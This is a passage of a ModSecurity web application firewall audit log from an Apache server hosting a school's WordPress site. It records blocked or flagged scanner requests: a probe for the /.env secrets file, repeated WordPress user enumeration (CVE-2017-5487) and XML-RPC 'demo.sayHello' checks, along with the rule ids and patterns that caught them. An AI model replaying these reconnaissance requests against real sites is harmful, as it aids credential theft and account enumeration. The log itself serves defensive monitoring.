(http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c8c72969-Z-- --b7cd2c19-A-- [03/May/2025:22:57:11 +0700] aBY814OgvPi2IO4kz1v9jwAAAJI 103.236.140.4 38250 103.236.140.4 8181 --b7cd2c19-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 142.93.70.211 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 142.93.70.211 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --b7cd2c19-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b7cd2c19-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746287831586301 792 (- - -) Stopwatch2: 1746287831586301 792; combined=319, p1=286, p2=0, p3=0, p4=0, p5=33, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b7cd2c19-Z-- --bb738027-A-- [03/May/2025:22:58:00 +0700] aBY9CIOgvPi2IO4kz1v9kAAAAJE 103.236.140.4 38252 103.236.140.4 8181 --bb738027-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.15.24 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.15.24 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bb738027-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bb738027-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746287880535492 3491 (- - -) Stopwatch2: 1746287880535492 3491; combined=1490, p1=464, p2=988, p3=0, p4=0, p5=37, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bb738027-Z-- --777a8815-A-- [03/May/2025:22:58:05 +0700] aBY9DUSOhfQ6W15Bgg8MJQAAAEg 103.236.140.4 38256 103.236.140.4 8181 --777a8815-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.15.24 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.15.24 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --777a8815-C-- demo.sayHello --777a8815-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --777a8815-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746287885031256 6014 (- - -) Stopwatch2: 1746287885031256 6014; combined=4356, p1=548, p2=3579, p3=34, p4=36, p5=95, sr=74, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --777a8815-Z-- --04b5bf77-A-- [03/May/2025:23:14:17 +0700] aBZA2YOgvPi2IO4kz1sAhAAAAIY 103.236.140.4 45356 103.236.140.4 8181 --04b5bf77-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.14.85 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.14.85 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --04b5bf77-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --04b5bf77-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746288857837816 3323 (- - -) Stopwatch2: 1746288857837816 3323; combined=1478, p1=513, p2=917, p3=0, p4=0, p5=48, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --04b5bf77-Z-- --5c6e6e49-A-- [03/May/2025:23:14:26 +0700] aBZA4kSOhfQ6W15Bgg8P6QAAAFE 103.236.140.4 45360 103.236.140.4 8181 --5c6e6e49-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.14.85 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.14.85 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5c6e6e49-C-- demo.sayHello --5c6e6e49-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5c6e6e49-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746288866048657 6544 (- - -) Stopwatch2: 1746288866048657 6544; combined=4689, p1=623, p2=3831, p3=43, p4=38, p5=92, sr=81, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5c6e6e49-Z-- --0b431740-A-- [03/May/2025:23:15:35 +0700] aBZBJ0SOhfQ6W15Bgg8P6wAAAFU 103.236.140.4 45368 103.236.140.4 8181 --0b431740-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.160.38 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.160.38 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0b431740-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0b431740-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746288935338620 3213 (- - -) Stopwatch2: 1746288935338620 3213; combined=1338, p1=465, p2=843, p3=0, p4=0, p5=30, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0b431740-Z-- --74ea056a-A-- [03/May/2025:23:15:42 +0700] aBZBLileQJs6d7wanHHTvgAAAMU 103.236.140.4 45374 103.236.140.4 8181 --74ea056a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.160.38 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.160.38 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --74ea056a-C-- demo.sayHello --74ea056a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --74ea056a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746288942519675 6653 (- - -) Stopwatch2: 1746288942519675 6653; combined=4644, p1=602, p2=3806, p3=38, p4=42, p5=94, sr=77, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --74ea056a-Z-- --f04bb746-A-- [03/May/2025:23:31:14 +0700] aBZE0oOgvPi2IO4kz1sAkwAAAIY 103.236.140.4 45670 103.236.140.4 8181 --f04bb746-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.113.2 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.113.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f04bb746-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f04bb746-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746289874863410 3235 (- - -) Stopwatch2: 1746289874863410 3235; combined=1346, p1=472, p2=842, p3=0, p4=0, p5=32, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f04bb746-Z-- --9dc7ba39-A-- [03/May/2025:23:31:22 +0700] aBZE2oOgvPi2IO4kz1sAlgAAAIM 103.236.140.4 45678 103.236.140.4 8181 --9dc7ba39-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.113.2 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.113.2 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9dc7ba39-C-- demo.sayHello --9dc7ba39-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9dc7ba39-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746289882036981 7052 (- - -) Stopwatch2: 1746289882036981 7052; combined=5114, p1=636, p2=4232, p3=40, p4=40, p5=98, sr=100, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9dc7ba39-Z-- --a8970a1e-A-- [03/May/2025:23:31:38 +0700] aBZE6oOgvPi2IO4kz1sAmwAAAI0 103.236.140.4 45692 103.236.140.4 8181 --a8970a1e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.179.58 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.179.58 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a8970a1e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a8970a1e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746289898120891 2396 (- - -) Stopwatch2: 1746289898120891 2396; combined=1362, p1=442, p2=890, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a8970a1e-Z-- --25953e58-A-- [03/May/2025:23:31:40 +0700] aBZE7IOgvPi2IO4kz1sAnQAAAJM 103.236.140.4 45696 103.236.140.4 8181 --25953e58-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.179.58 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.179.58 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --25953e58-C-- demo.sayHello --25953e58-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --25953e58-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746289900597622 17840 (- - -) Stopwatch2: 1746289900597622 17840; combined=28229, p1=570, p2=3494, p3=34, p4=36, p5=12062, sr=73, sw=63, l=0, gc=11970 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --25953e58-Z-- --cf8ba37d-A-- [03/May/2025:23:56:07 +0700] aBZKp0SOhfQ6W15Bgg8QXgAAAEc 103.236.140.4 46516 103.236.140.4 8181 --cf8ba37d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.0.30 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.0.30 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --cf8ba37d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cf8ba37d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746291367580956 3208 (- - -) Stopwatch2: 1746291367580956 3208; combined=1418, p1=475, p2=911, p3=0, p4=0, p5=32, sr=99, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cf8ba37d-Z-- --217d0b48-A-- [03/May/2025:23:56:12 +0700] aBZKrCleQJs6d7wanHHUEQAAAMs 103.236.140.4 46520 103.236.140.4 8181 --217d0b48-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.0.30 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.0.30 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --217d0b48-C-- demo.sayHello --217d0b48-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --217d0b48-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746291372381724 6162 (- - -) Stopwatch2: 1746291372381724 6162; combined=4432, p1=609, p2=3598, p3=35, p4=37, p5=91, sr=80, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --217d0b48-Z-- --d7cf8504-A-- [03/May/2025:23:56:43 +0700] aBZKy0SOhfQ6W15Bgg8QYgAAAEE 103.236.140.4 46536 103.236.140.4 8181 --d7cf8504-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.103.177 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.103.177 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d7cf8504-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d7cf8504-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746291403636012 2701 (- - -) Stopwatch2: 1746291403636012 2701; combined=1432, p1=513, p2=889, p3=0, p4=0, p5=30, sr=153, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d7cf8504-Z-- --982e5515-A-- [03/May/2025:23:56:50 +0700] aBZK0kSOhfQ6W15Bgg8QZAAAAFU 103.236.140.4 46540 103.236.140.4 8181 --982e5515-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.103.177 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.103.177 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --982e5515-C-- demo.sayHello --982e5515-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --982e5515-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746291410148060 4892 (- - -) Stopwatch2: 1746291410148060 4892; combined=3804, p1=481, p2=3117, p3=24, p4=26, p5=91, sr=95, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --982e5515-Z-- --9ed21c5e-A-- [03/May/2025:23:56:56 +0700] aBZK2ESOhfQ6W15Bgg8QZgAAAEM 103.236.140.4 46544 103.236.140.4 8181 --9ed21c5e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.84.129 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.84.129 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9ed21c5e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9ed21c5e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746291416221599 2782 (- - -) Stopwatch2: 1746291416221599 2782; combined=1301, p1=428, p2=844, p3=0, p4=0, p5=29, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9ed21c5e-Z-- --035b0c6a-A-- [03/May/2025:23:57:02 +0700] aBZK3ileQJs6d7wanHHUEwAAANU 103.236.140.4 46554 103.236.140.4 8181 --035b0c6a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.84.129 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.84.129 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --035b0c6a-C-- demo.sayHello --035b0c6a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --035b0c6a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746291422604296 6319 (- - -) Stopwatch2: 1746291422604296 6319; combined=4519, p1=590, p2=3590, p3=36, p4=36, p5=148, sr=77, sw=119, l=0, gc=0 Producer: ModSecurity for 